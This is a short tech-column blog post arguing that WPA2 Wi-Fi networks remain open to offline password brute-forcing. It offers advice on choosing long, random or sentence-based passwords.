What no one is saying about WPA2 security

Many articles have been written in the last few days about the latest flaw discovered in WPA TKIP security for wireless networks. In a nutshell they all boil down to WPA bad, WPA2 good.

Never mind that most articles contains technical mistakes, I plan to write about that next time. The glaring problem with the coverage of the latest WPA TKIP flaw is what the technical press is not saying.

WPA2 is not, in and of itself, good security.

While WPA2 is immune from the latest attack, as well as the one discovered back in November of last year, these are both online attacks. But WPA2, just like WPA, has a glaring hole when it comes to offline attacks.

Encrypted packets can be captured out of the air and brute-forced offline. That is, someone can try to guess the password for weeks on end and you would have no clue that this was happening. To be really secure, requires a long, reasonably random password.

The password for both WPA and WPA2 can range from 8 to 63 characters. Longer is better and words in the dictionary should be avoided.

How long is a matter of opinion. Many suggest a password of at least 20 characters. Back in 2005, George Ou argued that a random password of 8 or 9 characters was "reasonably safe".

The problem with random passwords, of course, is remembering them. But the good news with WPA and WPA2 passwords is that you shouldn't need to remember them. For one thing, the password typically only needs to be entered once per computer accessing a given wireless network. And since you are always close to the router, a piece of paper with the password on it, taped to the router, should be sufficient.

If you want a memorable password, try starting with a sentence. For example, take

I love Rhode Island in the summer

The first letter of each word results in "IlRIits" which is pretty random and combines upper and lower case letters. Put a simple sequence of numbers or special characters on one end of this and you get a reasonably random password that should be memorable.

Or, do what I do and use a pass sentence rather than a password. The sample sentence above isn't all that much to type, but I'd add at least one special character to it for good luck.

FREE Computerworld Insider Guide: IT Certification Study Tips
Join the discussion
Be the first to comment on this article. Our Commenting Policies